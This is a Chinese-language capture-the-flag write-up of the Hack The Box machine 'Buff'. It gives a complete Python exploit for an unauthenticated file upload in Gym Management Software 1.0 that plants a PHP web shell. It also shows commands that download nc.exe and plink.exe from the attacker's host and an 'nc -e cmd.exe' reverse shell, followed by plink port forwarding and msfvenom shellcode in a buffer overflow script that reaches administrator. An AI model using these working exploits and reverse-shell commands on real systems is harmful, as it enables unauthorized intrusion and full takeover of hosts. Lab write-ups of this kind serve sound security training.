
HTB-[buff]

0x00.简述

0x01.信息收集

开放了8080端口

root@JIYE:~/htb/buff# nmap -sC -sV -sT 10.10.10.198 -oN nmap.CVT
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-01 02:33 EDT
Nmap scan report for 10.10.10.198
Host is up (0.32s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE VERSION
8080/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-title: mrb3n's Bro Hut

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.65 seconds
root@JIYE:~/htb/buff#

0x02.访问8080

手动爬虫发现使用了Gym Management Software 1.0

0x03.查找exp,存在RCE

利用详情

exp url

1.访问“ /upload.php”页面,因为它不检查经过身份验证的用户会话。

2.将GET请求的’id’参数设置为所上传的PHP文件所需的文件名。

3.通过添加两个扩展绕过扩展白名单,最后一个作为可接受的扩展(PNG)。

4.通过在POST请求中将’file’参数的’Content-Type’修改为’image/png’来绕过文件类型检查,并将’pupload’参数设置为’upload’。

5.在POST请求的“file”参数的主体中,插入恶意的PHP代码:

6.Web应用程序将对文件进行重命名,使其具有从文件名称创建的数组中的第二个扩展项;由’.’字符分开。

7.使用带有telepathy参数的GET请求,与位于’/upload.php?id=kamehameha’的webshell进行通信。

import requests, sys, urllib, re
from colorama import Fore, Back, Style
# Silence urllib3's InsecureRequestWarning: every request in this script passes
# verify=False, i.e. TLS certificate validation is deliberately disabled.
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)

def webshell(SERVER_URL, session):
    """Interactive read/eval loop over the uploaded PHP web shell.

    SERVER_URL: base URL of the web application; it is concatenated directly
        with 'upload/kamehameha.php', so a trailing slash is expected.
    session: requests.Session used only for the initial connectivity probe.
        The command loop below calls the module-level requests.get(), so any
        cookies held by `session` are not sent with later commands.

    Never returns normally: the loop runs until an exception occurs, after
    which the process exits with status -1.
    """
    try:
        WEB_SHELL = SERVER_URL+'upload/kamehameha.php'
        # Probe the shell with `echo %CD%` so the prompt can show the
        # remote working directory.
        getdir = {'telepathy': 'echo %CD%'}
        r2 = session.get(WEB_SHELL, params=getdir, verify=False)
        status = r2.status_code
        if status != 200:
            print Style.BRIGHT+Fore.RED+"[!] "+Fore.RESET+"Could not connect to the webshell."+Style.RESET_ALL
            r2.raise_for_status()
        print(Fore.GREEN+'[+] '+Fore.RESET+'Successfully connected to webshell.')
        # First substring of the response that starts with a drive letter C-F.
        # If nothing matches, cwd[0] raises IndexError, which the bare
        # except below turns into "Exiting.".
        cwd = re.findall('[CDEF].*', r2.text)
        cwd = cwd[0]+"> "
        term = Style.BRIGHT+Fore.GREEN+cwd+Fore.RESET
        while True:
            thought = raw_input(term)
            command = {'telepathy': thought}
            # NOTE: module-level requests.get, not `session` (see docstring).
            r2 = requests.get(WEB_SHELL, params=command, verify=False)
            status = r2.status_code
            if status != 200:
                r2.raise_for_status()
            response2 = r2.text
            print(response2)
    except:
        # Bare except: also catches KeyboardInterrupt / EOFError from
        # raw_input, so Ctrl-C ends up here as a normal exit path.
        print("\r\nExiting.")
        sys.exit(-1)

def formatHelp(STRING):
    """Return STRING wrapped in bright red, with the foreground colour reset afterwards."""
    pieces = (Style.BRIGHT, Fore.RED, STRING, Fore.RESET)
    return ''.join(pieces)

def header():
    """Build the four-line coloured ASCII banner printed before the usage text."""
    bright_green = Style.BRIGHT+Fore.GREEN
    reset_all = Style.RESET_ALL
    fg_reset = Fore.RESET
    rows = [
        bright_green+' /\\\n'+reset_all,
        Fore.YELLOW+'/vvvvvvvvvvvv '+bright_green+'\\'+fg_reset+'--------------------------------------,\n',
        Fore.YELLOW+'`^^^^^^^^^^^^'+bright_green+' /'+fg_reset+'============'+Fore.RED+'BOKU'+fg_reset+'====================="\n',
        bright_green+' \\/'+reset_all+'\n',
    ]
    return ''.join(rows)

# Entry point: upload the PHP web shell as a "PNG", then hand control to the
# interactive loop in webshell().
if __name__ == "__main__":
    print header();
    if len(sys.argv) != 2:
        print formatHelp("(+) Usage:\t python %s <WEBAPP_URL>" % sys.argv[0])
        print formatHelp("(+) Example:\t python %s 'https://10.0.0.3:443/gym/'" % sys.argv[0])
        sys.exit(-1)
    SERVER_URL = sys.argv[1]
    # The 'id' query parameter is the name the application stores the upload
    # under; webshell() later reads it back as upload/kamehameha.php.
    UPLOAD_DIR = 'upload.php?id=kamehameha'
    UPLOAD_URL = SERVER_URL + UPLOAD_DIR
    s = requests.Session()
    # Initial GET on the same session -- presumably to pick up a session
    # cookie before the POST; its result is not checked.
    s.get(SERVER_URL, verify=False)
    # 7 bytes here; together with the '\n' appended below this is the full
    # 8-byte PNG file signature (\x89 P N G \r \n \x1a \n).
    PNG_magicBytes = '\x89\x50\x4e\x47\x0d\x0a\x1a'
    # Two weaknesses of the target are exercised by this multipart field:
    # the double extension (the app keeps the '.php' component while '.png'
    # satisfies its extension whitelist) and a MIME check that trusts the
    # client-supplied Content-Type ('image/png') instead of the file content.
    # On the server side the fix is to require an authenticated session on
    # upload.php, store files under a server-chosen name/extension, and
    # validate image content rather than the declared type.
    png = {
        'file':
        (
            'kaio-ken.php.png',
            PNG_magicBytes+'\n'+'<?php echo shell_exec($_GET["telepathy"]); ?>',
            'image/png',
            {'Content-Disposition': 'form-data'}
        )
    }
    fdata = {'pupload': 'upload'}
    # r1 is never inspected: a failed upload is only noticed when webshell()
    # cannot reach the shell.
    r1 = s.post(url=UPLOAD_URL, files=png, data=fdata, verify=False)
    webshell(SERVER_URL, s)

0x04.exploit

root@JIYE:~/htb/buff# python2 gymrce.py http://10.10.10.198:8080/
/\
/vvvvvvvvvvvv \--------------------------------------,
`^^^^^^^^^^^^ /============BOKU====================="
\/

[+] Successfully connected to webshell.
C:\xampp\htdocs\gym\upload>
C:\xampp\htdocs\gym\upload> whoami
�PNG

buff\shaun

C:\xampp\htdocs\gym\upload>

0x05.验证

利用完成就可以使用带有telepathy参数的GET请求,与位于’/upload.php?id=kamehameha’的webshell进行通信。

0x06.反弹shell

上传nc.exe

http://10.10.10.198:8080/upload/kamehameha.php?telepathy=curl -O http://10.10.17.216/nc.exe

root@JIYE:~# cp /usr/share/windows-binaries/nc.exe ./htb/buff/
root@JIYE:~# cd htb/buff/
root@JIYE:~/htb/buff# ls
gymrce.py nc.exe nmap.CVT
root@JIYE:~/htb/buff# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...

root@JIYE:~/htb/buff# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
10.10.10.198 - - [01/Sep/2020 03:53:36] "GET /nc.exe HTTP/1.1" 200 -

kali监听

root@JIYE:~/htb/buff# nc -nvlp 6666
listening on [any] 6666 ...

反弹

http://10.10.10.198:8080/upload/kamehameha.php?telepathy=nc -e cmd.exe 10.10.17.216 6666

root@JIYE:~/htb/buff# nc -nvlp 6666
listening on [any] 6666 ...
connect to [10.10.17.216] from (UNKNOWN) [10.10.10.198] 51130
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\xampp\htdocs\gym\upload>
C:\xampp\htdocs\gym\upload>whoami
whoami
buff\shaun

C:\xampp\htdocs\gym\upload>cd\

找到user.txt

C:\Users\shaun\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is A22D-49F7

Directory of C:\Users\shaun\Desktop

14/07/2020 13:27 <DIR> .
14/07/2020 13:27 <DIR> ..
01/09/2020 07:25 34 user.txt
1 File(s) 34 bytes
2 Dir(s) 8,142,823,424 bytes free

C:\Users\shaun\Desktop>type user.txt
type user.txt
*********************************

0x07.提权

查看当前目录下文件,发现好多"前辈"上传的文件😂

C:\xampp\htdocs\gym\upload>dir
dir
Volume in drive C has no label.
Volume Serial Number is A22D-49F7

Directory of C:\xampp\htdocs\gym\upload

01/09/2020 08:55 <DIR> .
01/09/2020 08:55 <DIR> ..
01/09/2020 07:52 7,481,344 chisel.exe
01/09/2020 08:33 53 kamehameha.php
21/08/2017 14:40 59,392 nc.exe
01/09/2020 08:54 59,392 ncat.exe
01/09/2020 08:55 311,296 p1ink.exe
21/08/2017 14:40 311,296 plink.exe
01/09/2020 08:39 47 shell.php
7 File(s) 8,222,820 bytes
2 Dir(s) 8,263,647,232 bytes free

C:\xampp\htdocs\gym\upload>

上传plink

Plink是Windows命令行SSH客户端,是SSH协议的一个实现。

root@JIYE:~# cp /usr/share/windows-binaries/plink.exe ./htb/buff/
root@JIYE:~#root@JIYE:~/htb/buff# ls
flag gymrce.py nc.exe nmap.CVT plink.exe
root@JIYE:~/htb/buff# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
10.10.10.198 - - [01/Sep/2020 04:35:27] "GET /plink.exe HTTP/1.1" 200 -

http://10.10.10.198:8080/upload/kamehameha.php?telepathy=curl http://10.10.17.216/plink.exe -o plink_f.exe

C:\xampp\htdocs\gym\upload>dir
dir
Volume in drive C has no label.
Volume Serial Number is A22D-49F7

Directory of C:\xampp\htdocs\gym\upload

01/09/2020 09:37 <DIR> .
01/09/2020 09:37 <DIR> ..
01/09/2020 07:52 7,481,344 chisel.exe
01/09/2020 09:33 53 kamehameha.php
21/08/2017 14:40 59,392 nc.exe
01/09/2020 08:54 59,392 ncat.exe
01/09/2020 08:55 311,296 p1ink.exe
21/08/2017 14:40 311,296 plink.exe
01/09/2020 09:37 311,296 plink_f.exe
01/09/2020 08:39 47 shell.php
8 File(s) 8,534,116 bytes
2 Dir(s) 8,604,606,464 bytes free

C:\xampp\htdocs\gym\upload>

查看系统架构,结果为64位

C:\xampp\htdocs\gym\upload>systeminfo   
systeminfo

Host Name: BUFF
OS Name: Microsoft Windows 10 Enterprise
OS Version: 10.0.17134 N/A Build 17134
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: shaun
Registered Organization:
Product ID: 00329-10280-00000-AA218
Original Install Date: 16/06/2020, 15:05:58
System Boot Time: 01/09/2020, 10:57:29
System Manufacturer: VMware, Inc.
System Model: VMware7,1
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
[02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: VMware, Inc. VMW71.00V.13989454.B64.1906190538, 19/06/2019
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume2
System Locale: en-us;English (United States)
Input Locale: en-gb;English (United Kingdom)
Time Zone: (UTC+00:00) Dublin, Edinburgh, Lisbon, London
Total Physical Memory: 4,095 MB
Available Physical Memory: 2,240 MB
Virtual Memory: Max Size: 4,799 MB
Virtual Memory: Available: 2,325 MB
Virtual Memory: In Use: 2,474 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: vmxnet3 Ethernet Adapter
Connection Name: Ethernet0
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.198
[02]: fe80::fc70:a698:752c:f5c3
[03]: dead:beef::9007:7d8e:af8f:9419
[04]: dead:beef::fc70:a698:752c:f5c3
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.

C:\xampp\htdocs\gym\upload>

本来想上传个winPEASx64.exe扫描可以用来提权的程序,霸特不能执行。。

PS C:\xampp\htdocs\gym\upload> dir
dir

Directory: C:\xampp\htdocs\gym\upload

Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 01/09/2020 14:32 53 kamehameha.php
-a---- 01/09/2020 11:01 59392 nc.exe
-a---- 01/09/2020 14:12 38616 nc1.exe
-a---- 01/09/2020 12:48 0 pe.exe
-a---- 01/09/2020 11:01 311296 plink.exe
-a---- 01/09/2020 12:17 5 start
-a---- 01/09/2020 12:17 5 status
-a---- 01/09/2020 14:16 400 winP
-a---- 01/09/2020 14:19 33057 winP.bat
-a---- 01/09/2020 14:16 400 winP.exe
-a---- 01/09/2020 13:16 279987 winPEAS.bat
-a---- 01/09/2020 13:05 87839 winPEASany.exe
-a---- 01/09/2020 12:45 0 winPEASexe
-a---- 01/09/2020 13:10 87839 winPEASx64.exe
PS C:\xamp\htdocs\gym\upload>

查看端口占用情况,可以看到8888被监听

C:\xampp\htdocs\gym\upload>netstat -nao | findstr "8888"
netstat -nao | findstr "8888"
TCP 127.0.0.1:8888 0.0.0.0:0 LISTENING 5828

C:\xampp\htdocs\gym\upload>

使用plink进行端口转发,霸特失败了,个人猜测是防火墙的原因。

C:\xampp\htdocs\gym\upload>plink.exe -v -x -a -T -C -noagent -ssh -pw "root" -R 8888:127.0.0.1:8888 root@10.10.17.216

报错为:无法同意密钥交换算法

Google一下发现需要更新putty,但是更新后还是不好使。。。菜狗一脸茫然!

C:\xampp\htdocs\gym\upload>plink.exe -v -x -a -T -C -noagent -ssh -pw “root” -R 8888:127.0.0.1:8888 root@10.10.17.216
plink.exe -v -x -a -T -C -noagent -ssh -pw “root” -R 8888:127.0.0.1:8888 root@10.10.17.216
Looking up host “10.10.17.216”
Connecting to 10.10.17.216 port 22
Server version: SSH-2.0-OpenSSH_8.3p1 Debian-1
Using SSH protocol version 2
We claim version: SSH-2.0-PuTTY_Release_0.63
Couldn’t agree a key exchange algorithm (available: curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256)
FATAL ERROR: Couldn’t agree a key exchange algorithm (available: curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256)

第二天我又来了,这回成功了!这回换成了powershell。

PS C:\xampp\htdocs\gym\upload> .\plink.exe -v -x -a -T -C -noagent -ssh -pw "root" -R 8888:127.0.0.1:8888 root@10.10.17.216
.\plink.exe -v -x -a -T -C -noagent -ssh -pw "root" -R 8888:127.0.0.1:8888 root@10.10.17.216
Looking up host "10.10.17.216" for SSH connection
Connecting to 10.10.17.216 port 22
We claim version: SSH-2.0-PuTTY_Release_0.74
Remote version: SSH-2.0-OpenSSH_8.3p1 Debian-1
Using SSH protocol version 2
Doing ECDH key exchange with curve Curve25519 and hash SHA-256 (SHA-NI accelerated)
Server also has ecdsa-sha2-nistp256/ssh-rsa host keys, but we don't know any of them
Host key fingerprint is:
ssh-ed25519 255 83:5a:22:c2:54:d1:3b:98:fa:09:81:52:f2:3b:75:8e
The server's host key is not cached in the registry. You
have no guarantee that the server is the computer you
think it is.
The server's ssh-ed25519 key fingerprint is:
ssh-ed25519 255 83:5a:22:c2:54:d1:3b:98:fa:09:81:52:f2:3b:75:8e
If you trust this host, enter "y" to add the key to
PuTTY's cache and carry on connecting.
If you want to carry on connecting just once, without
adding the key to the cache, enter "n".
If you do not trust this host, press Return to abandon the
connection.
Store key in cache? (y/n) y
Initialised AES-256 SDCTR (AES-NI accelerated) outbound encryption
Initialised HMAC-SHA-256 (SHA-NI accelerated) outbound MAC algorithm
Will enable zlib (RFC1950) compression after user authentication
Initialised AES-256 SDCTR (AES-NI accelerated) inbound encryption
Initialised HMAC-SHA-256 (SHA-NI accelerated) inbound MAC algorithm
Will enable zlib (RFC1950) decompression after user authentication
Using username "root".
Sent password
Initialised delayed zlib (RFC1950) decompression
Initialised delayed zlib (RFC1950) compression
Access granted
Requesting remote port 8888 forward to 127.0.0.1:8888
Opening main session channel
Remote port forwarding from 8888 enabled
Opened main channel
Started a shell/command
Linux JIYE 5.7.0-kali1-amd64 #1 SMP Debian 5.7.6-1kali2 (2020-07-01) x86_64

The programs included with the Kali GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Kali GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
ls
arachni
cacert.der
clash
CS4.0
Desktop
Documents
Downloads
get-pip.py
htb
Lluna.ovpn
Lluna.ovpn.bak
Music
Pictures
Public
python_shell
Templates
Videos
vulnhub

下面用Buffer Overflow 来提权URL

使用msfvenom生成shellcode替换原来的

root@JIYE:~/htb/buff# msfvenom -p windows/exec CMD='C:\xampp\htdocs\gym\upload\nc.exe -e cmd.exe 10.10.17.216 7078' -b '\x00\x0A\x0D' -f python -v payload
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 274 (iteration=0)
x86/shikata_ga_nai chosen with final size 274
Payload size: 274 bytes
Final size of python file: 1456 bytes
payload = b""
payload += b"\xba\xd7\xda\x14\xc1\xdb\xcd\xd9\x74\x24\xf4\x58"
payload += b"\x31\xc9\xb1\x3e\x31\x50\x15\x83\xc0\x04\x03\x50"
payload += b"\x11\xe2\x22\x26\xfc\x43\xcc\xd7\xfd\x23\x45\x32"
payload += b"\xcc\x63\x31\x36\x7f\x54\x32\x1a\x8c\x1f\x16\x8f"
payload += b"\x07\x6d\xbe\xa0\xa0\xd8\x98\x8f\x31\x70\xd8\x8e"
payload += b"\xb1\x8b\x0c\x71\x8b\x43\x41\x70\xcc\xbe\xab\x20"
payload += b"\x85\xb5\x19\xd5\xa2\x80\xa1\x5e\xf8\x05\xa1\x83"
payload += b"\x49\x27\x80\x15\xc1\x7e\x02\x97\x06\x0b\x0b\x8f"
payload += b"\x4b\x36\xc2\x24\xbf\xcc\xd5\xec\xf1\x2d\x79\xd1"
payload += b"\x3d\xdc\x80\x15\xf9\x3f\xf7\x6f\xf9\xc2\x0f\xb4"
payload += b"\x83\x18\x9a\x2f\x23\xea\x3c\x94\xd5\x3f\xda\x5f"
payload += b"\xd9\xf4\xa9\x38\xfe\x0b\x7e\x33\xfa\x80\x81\x94"
payload += b"\x8a\xd3\xa5\x30\xd6\x80\xc4\x61\xb2\x67\xf9\x72"
payload += b"\x1d\xd7\x5f\xf8\xb0\x0c\xd2\xa3\xde\xd3\x61\xde"
payload += b"\xad\xd4\x79\xe1\x81\xbc\x48\x6a\x4e\xba\x55\xb9"
payload += b"\x2a\x34\x1c\xe0\x1b\xdd\xf8\x70\x1e\x80\xfb\xae"
payload += b"\x5d\xbd\x7f\x5b\x1e\x3a\x9f\x2e\x1b\x06\x18\xc2"
payload += b"\x51\x17\xcc\xe4\xc6\x18\xc5\xa6\xd2\xba\x9d\x49"
payload += b"\x4e\x33\x2d\xd6\xf8\xc7\xa9\x89\x9b\x54\x6d\x31"
payload += b"\x25\xf6\xd1\xc8\xa5\x64\x86\x53\x22\x29\x36\xf7"
payload += b"\x84\xb4\xbe\x92\xf8\x1b\x5b\x7d\x9a\x0e\xc7\x53"
payload += b"\x39\xa9\x62\x8c\xf0\x79\x42\xfd\xc2\x57\xab\xca"
payload += b"\x0c\x9a\xfa\x02\x71\xed\xcc\x5d\x49\x11"
root@JIYE:~/htb/buff#

编辑payload

root@JIYE:~/htb/buff# cat buff.py 
import socket

# Connects to localhost: port 8888 on the Kali host is the plink remote
# forward of 127.0.0.1:8888 on the target set up earlier on this page.
target = "127.0.0.1"

# Per the author's offset, 1052 bytes of filler precede the saved return
# address that EIP below overwrites.
padding1 = b"\x90" * 1052
# Little-endian encoding of the gadget address named in the comment.
# Presumably ESP points just past the overwritten return address, i.e. at
# NOPS, so PUSH ESP; RET lands on the sled -- confirm against the target.
EIP = b"\xB5\x42\xA8\x68" # 0x68A842B5 -> PUSH ESP, RET
# 0x90 is the x86 NOP; short sled between the gadget landing and the shellcode.
NOPS = b"\x90" * 30

#msfvenom -a x86 -p windows/exec CMD=calc.exe -b '\x00\x0A\x0D' -f python
# NOTE(review): the comment above is stale. These bytes match the msfvenom
# run shown earlier on this page, windows/exec with
# CMD='C:\xampp\htdocs\gym\upload\nc.exe -e cmd.exe 10.10.17.216 7078',
# not calc.exe. Bad chars \x00\x0A\x0D were excluded in that run.
payload = b""
payload += b"\xba\xd7\xda\x14\xc1\xdb\xcd\xd9\x74\x24\xf4\x58"
payload += b"\x31\xc9\xb1\x3e\x31\x50\x15\x83\xc0\x04\x03\x50"
payload += b"\x11\xe2\x22\x26\xfc\x43\xcc\xd7\xfd\x23\x45\x32"
payload += b"\xcc\x63\x31\x36\x7f\x54\x32\x1a\x8c\x1f\x16\x8f"
payload += b"\x07\x6d\xbe\xa0\xa0\xd8\x98\x8f\x31\x70\xd8\x8e"
payload += b"\xb1\x8b\x0c\x71\x8b\x43\x41\x70\xcc\xbe\xab\x20"
payload += b"\x85\xb5\x19\xd5\xa2\x80\xa1\x5e\xf8\x05\xa1\x83"
payload += b"\x49\x27\x80\x15\xc1\x7e\x02\x97\x06\x0b\x0b\x8f"
payload += b"\x4b\x36\xc2\x24\xbf\xcc\xd5\xec\xf1\x2d\x79\xd1"
payload += b"\x3d\xdc\x80\x15\xf9\x3f\xf7\x6f\xf9\xc2\x0f\xb4"
payload += b"\x83\x18\x9a\x2f\x23\xea\x3c\x94\xd5\x3f\xda\x5f"
payload += b"\xd9\xf4\xa9\x38\xfe\x0b\x7e\x33\xfa\x80\x81\x94"
payload += b"\x8a\xd3\xa5\x30\xd6\x80\xc4\x61\xb2\x67\xf9\x72"
payload += b"\x1d\xd7\x5f\xf8\xb0\x0c\xd2\xa3\xde\xd3\x61\xde"
payload += b"\xad\xd4\x79\xe1\x81\xbc\x48\x6a\x4e\xba\x55\xb9"
payload += b"\x2a\x34\x1c\xe0\x1b\xdd\xf8\x70\x1e\x80\xfb\xae"
payload += b"\x5d\xbd\x7f\x5b\x1e\x3a\x9f\x2e\x1b\x06\x18\xc2"
payload += b"\x51\x17\xcc\xe4\xc6\x18\xc5\xa6\xd2\xba\x9d\x49"
payload += b"\x4e\x33\x2d\xd6\xf8\xc7\xa9\x89\x9b\x54\x6d\x31"
payload += b"\x25\xf6\xd1\xc8\xa5\x64\x86\x53\x22\x29\x36\xf7"
payload += b"\x84\xb4\xbe\x92\xf8\x1b\x5b\x7d\x9a\x0e\xc7\x53"
payload += b"\x39\xa9\x62\x8c\xf0\x79\x42\xfd\xc2\x57\xab\xca"
payload += b"\x0c\x9a\xfa\x02\x71\xed\xcc\x5d\x49\x11"
# Pad the whole buffer out to exactly 1500 bytes.
overrun = b"C" * (1500 - len(padding1 + NOPS + EIP + payload))

buf = padding1 + EIP + NOPS + payload + overrun

try:
    s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((target,8888))
    # Single send, no reply expected; the socket is never closed (one-shot
    # script, but it does leak the descriptor until exit).
    s.send(buf)
except Exception as e:
    # NOTE(review): `sys` is never imported and sys.exc_value does not exist
    # in Python 3 (the script is run with python3 on this page), so this
    # handler raises NameError instead of reporting the error. print(e) is
    # what was intended.
    print(sys.exc_value)
root@JIYE:~/htb/buff#

kali监听端口

root@JIYE:~# nc -nvlp 7078
listening on [any] 7078 ...

执行buff.py利用

root@JIYE:~/htb/buff# python3 buff.py
root@JIYE:~# nc -nvlp 7078
listening on [any] 7078 ...
connect to [10.10.17.216] from (UNKNOWN) [10.10.10.198] 50209
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>
C:\Windows\system32>whoami
whoami
buff\administrator

提权完成,寻找root.txt

C:\Users\Administrator\Desktop>type root.txt
type root.txt
af0c7f7eef091d9e4b4cd0f0e88268c9

C:\Users\Administrator\Desktop>
-------------纸短情长下次再见-------------